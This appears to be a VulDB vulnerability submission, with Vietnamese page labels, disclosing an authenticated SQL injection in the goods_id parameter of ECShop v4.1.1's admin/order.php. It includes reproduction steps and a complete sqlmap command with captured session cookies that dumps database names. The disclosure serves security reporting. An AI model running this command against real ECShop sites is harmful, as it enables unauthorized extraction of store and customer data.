| tiêu đề | EcShop v4.1.1 SQL injection vulnerability |
|---|
| Mô tả | A vulnerability was discovered in Ecshop v4.1.1. After logging in to the system, the parameter id exists in order.php, and the parameter goods_id [0] does not perform normal filtering, resulting in sql injection. An attacker can exploit this vulnerability to obtain data.
1、First log in to the backend, then visit the page below and use bp to capture the packet to obtain the corresponding cookie.
/ECShop_V4.1.1/source/ecshop/admin/order.php
2、Use sqlmap to test and find that the database data can be successfully obtained (note that the content in the cookie is replaced)
sqlmap -u "http://172.16.214.182/ECShop_V4.1.1/source/ecshop/admin/order.php" --data "act=step_post&step=edit_goods&rec_id[0]=123&goods_id[0]=123" -p "goods_id [0]" --skip "act,cookie,user-agent,referer,host" --risk 3 --level 5 --dbms mysql --cookie "loginNum=1; PHPSESSID=piaila6qd5r8t6dgu7uc2n7npa; ECS_ID=7eb1e55af81381afca79372cb511a673156443d4; ECS[ visit_times]=1; ECSCP_ID=1d3446c72ce416fa895203f48ebf1afe98381002" --tamper "between" --dbs --flush-session --answers="follow=n" --batch --random-agent |
|---|
| Nguồn | ⚠️ https://github.com/xhcccan/code/issues/2 |
|---|
| Người dùng | xhccan (UID 52599) |
|---|
| Đệ trình | 24/09/2023 12:17 (cách đây 3 những năm) |
|---|
| Kiểm duyệt | 29/09/2023 16:19 (5 days later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 240925 [ECshop 4.1.1 /admin/order.php goods_id Tiêm SQL] |
|---|
| điểm | 20 |
|---|